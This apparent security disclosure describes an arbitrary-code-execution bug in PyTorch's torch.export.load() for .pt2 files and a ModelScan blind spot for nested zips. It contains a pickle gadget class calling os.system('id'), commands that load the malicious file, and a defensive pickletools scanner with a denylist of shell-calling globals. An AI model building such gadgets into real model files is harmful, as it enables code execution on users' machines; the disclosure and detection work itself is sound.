PoC: Arbitrary code execution loading a malicious .pt2 (Torch Export)
Security research proof-of-concept for the huntr Model File Vulnerability program (target: Torch Export
.pt2). The file is non-destructive: on torch.export.load() it runs `id` and writes the output to /tmp/PT2_RCE_PROOF.txt. It runs no other command.
What this demonstrates
malicious.pt2 is a valid Torch Export archive in which one weight's config entry
is marked use_pickle: true and its blob is a torch.save pickle gadget. When
loaded, torch.export.load() reconstructs that weight via:
torch.load(io.BytesIO(weight_bytes), weights_only=False) # _package.py:877 / :935
weights_only=False runs the standard pickle machinery, so the gadget's __reduce__
executes. torch.export.load() exposes no weights_only parameter, so there is
no safe way to load a .pt2: it silently bypasses the weights_only=True default
PyTorch adopted in 2.6.
import torch
torch.export.load("malicious.pt2") # -> executes `id`, writes /tmp/PT2_RCE_PROOF.txt
Also: ProtectAI ModelScan reports this file clean ("No issues found!").
ModelScan opens the .pt2 zip but refuses to descend into the nested torch.save
zip that carries the gadget (ModelScan does not support nested zip files), so the
malicious pickle is never inspected.
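The gap described above (the gadget sits in a torch.save zip nested inside the .pt2 zip, and the scanner never descends into it) is closed by a scanner that recurses into nested zips and disassembles every pickle member with pickletools instead of loading it. This is an added example, not code from this PoC, from ModelScan or from PyTorch. The archive built by build_sample_pt2, its member names and the use_pickle config.json are constructed stand-ins for the real .pt2 layout (which this page does not spell out), and the Gadget class is only serialized, never unpickled, so nothing here runs a command.

```python
import io
import os
import pickle
import pickletools
import zipfile

# Callables a weight blob has no business naming. Every GLOBAL/STACK_GLOBAL reference
# is reported; these are additionally flagged as dangerous. "posix"/"nt" is what pickle
# actually writes for os.system on Linux/Windows (the function's real __module__), and
# "__builtin__" is the protocol<3 spelling of "builtins".
DANGEROUS_GLOBALS = {
    ("os", "system"), ("posix", "system"), ("nt", "system"), ("os", "popen"),
    ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "check_output"),
    ("builtins", "eval"), ("builtins", "exec"), ("builtins", "__import__"),
    ("__builtin__", "eval"), ("__builtin__", "exec"),
}
STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}
# Opcodes that invoke a callable during unpickling; REDUCE is what fires __reduce__.
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def pickle_globals(blob):
    """Disassemble a pickle WITHOUT loading it: returns (globals referenced, calls_code).

    pickletools.genops only walks opcodes, so nothing in the stream executes.
    Raises ValueError when the bytes are not a pickle stream.
    """
    found, strings, calls = [], [], False
    for op, arg, _pos in pickletools.genops(blob):
        if op.name == "GLOBAL":                  # protocol <=3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":          # protocol 4+: two strings pushed before it
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif op.name in STRING_OPS:
            strings.append(arg)
        if op.name in CALL_OPS:
            calls = True
    return found, calls


def scan_archive(data, path):
    """Walk a zip, recurse into nested zips (torch.save output is itself a zip),
    and report every member that parses as a pickle."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            blob = zf.read(member)
            here = f"{path}!{member}"
            if zipfile.is_zipfile(io.BytesIO(blob)):
                findings.extend(scan_archive(blob, here))
                continue
            try:
                globals_, calls = pickle_globals(blob)
            except Exception:                    # JSON config, raw tensor bytes, etc.
                continue
            findings.append({"path": here, "globals": globals_, "calls": calls,
                             "dangerous": [g for g in globals_ if g in DANGEROUS_GLOBALS]})
    return findings


class Gadget:
    """torch.save-style gadget: unpickling it would call os.system("id").
    Here it is only serialized; pickle.dumps records the callable, it does not run it."""
    def __reduce__(self):
        return (os.system, ("id",))


def build_sample_pt2(protocol=2):
    """Constructed .pt2-shaped archive (hypothetical member names, not the real layout)."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:       # stands in for the nested torch.save zip
        z.writestr("data.pkl", pickle.dumps(Gadget(), protocol=protocol))
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("config.json", b'{"weights": {"w0": {"use_pickle": true}}}')
        z.writestr("weights/w0", inner.getvalue())                        # the gadget
        z.writestr("weights/w1.pkl", pickle.dumps({"bias": [0.0, 1.0]}))  # benign pickle
    return outer.getvalue()


def report(findings):
    """One line per pickle member: DANGEROUS / calls code / clean."""
    lines = []
    for f in findings:
        verdict = "DANGEROUS" if f["dangerous"] else ("calls code" if f["calls"] else "clean")
        lines.append(f"{f['path']}: {verdict} globals={f['globals']}")
    return lines


if __name__ == "__main__":
    for proto in (2, 4):                         # GLOBAL vs STACK_GLOBAL encodings
        print("\n".join(report(scan_archive(build_sample_pt2(proto), "malicious.pt2"))))
```

The nested path in the report (malicious.pt2!weights/w0!data.pkl) is the member ModelScan never reaches. Treat any REDUCE in a weight blob as suspicious even when the global is not on the list: a real weight pickle only needs torch's own rebuild helpers, so an allowlist of those is the better long-term gate than a denylist of shells.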
Reproduce
pip install torch==2.12.0
python3 poc.py # builds the file, loads it, prints the executed command output
# or load the bundled file directly:
python3 -c "import torch; torch.export.load('malicious.pt2')"; cat /tmp/PT2_RCE_PROOF.txt
modelscan -p malicious.pt2 # -> "No issues found!"
Files
malicious.pt2: the malicious (non-destructive) Torch Export file.
poc.py: builds the file from scratch and demonstrates the code execution.
Fix
torch.export.load() should default to weights_only=True and expose a
weights_only parameter, matching torch.load's post-2.6 posture.
Tested: PyTorch 2.12.0.